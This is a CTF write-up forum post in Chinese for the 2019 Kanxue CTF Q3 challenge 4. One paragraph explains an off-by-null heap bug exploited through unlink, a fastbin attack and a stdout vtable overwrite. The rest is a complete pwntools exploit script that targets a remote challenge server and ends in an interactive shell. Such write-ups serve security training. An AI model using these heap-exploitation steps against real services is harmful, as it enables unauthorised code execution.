-
-
[原创]【2019看雪CTF】Q3赛季 第四题:卧薪尝胆 WP
-
2019-9-24 12:43
3061
-
[原创]【2019看雪CTF】Q3赛季 第四题:卧薪尝胆 WP
#【2019看雪CTF】Q3赛季 第四题:卧薪尝胆 WP
edit存在off by null,而后利用unlink构造堆重叠进行fastbin attack,将stdout的vtable指向写满system的一串地址,并再次利用fastbin attack修改stdout的flags为p32(0xfbad1887)+";sh\x00",即可在输出时get shell。
from pwn import *
context.log_level="debug"
def add(size):
p.sendlineafter(">>","1")
p.sendlineafter(" : ",str(size))
def delete(index):
p.sendlineafter(">>","2")
p.sendlineafter(" : ",str(index))
def edit(index,note):
p.sendlineafter(">>","3")
p.sendlineafter(" : ",str(index))
p.sendafter(" : ",note)
#p=process("./pwn")
p=remote("154.8.174.214",10001)
add(0xf8)
add(0x68)
add(0xf8)
add(0x18)
delete(0)
edit(1,p64(0)*12+p64(0x170))
delete(2)
add(0xf8)#0
add(0x68)#2
add(0x68)#4
add(0x68)#5
delete(5)
delete(2)#1
edit(1,"\x70\n")
edit(4,"\x0d\n")
add(0x68)
add(0x68)
add(0x68)
p.recvuntil("heap 6 : ")
libc=int(p.recvuntil("\n"),16)+0x7ffff7a0d000-0x7ffff7dd1b1d
print hex(libc)
delete(1)
edit(2,p64(libc+0x7ffff7dd25dd-0x7ffff7a0d000)+"\n")
add(0x68)
add(0x68)
add(0x100)
p.recvuntil("heap 8 : ")
heap=int(p.recvuntil("\n"),16)
edit(8,p64(libc+0x45390)*20+"\n")
edit(7,"\x00\x00\x00"+p64(0)+p64(0)+p64(0)+p64(0)+p64(0)+p64(0)+p32(0xfbad1887)+";sh\x00\n")
delete(1)
edit(2,p64(libc+0x7ffff7dd26bd-0x7ffff7a0d000)+"\n")
add(0x68)
add(0x68)
#gdb.attach(p)
edit(9,"\x00\x00\x00"+p64(0)+p64(0)+p64(0)+p64(0)+p64(0)+p64(heap))
#gdb.attach(p)
p.interactive()
[CTF入门培训]顶尖高校博士及硕士团队亲授《30小时教你玩转CTF》,视频+靶场+题目!助力进入CTF世界
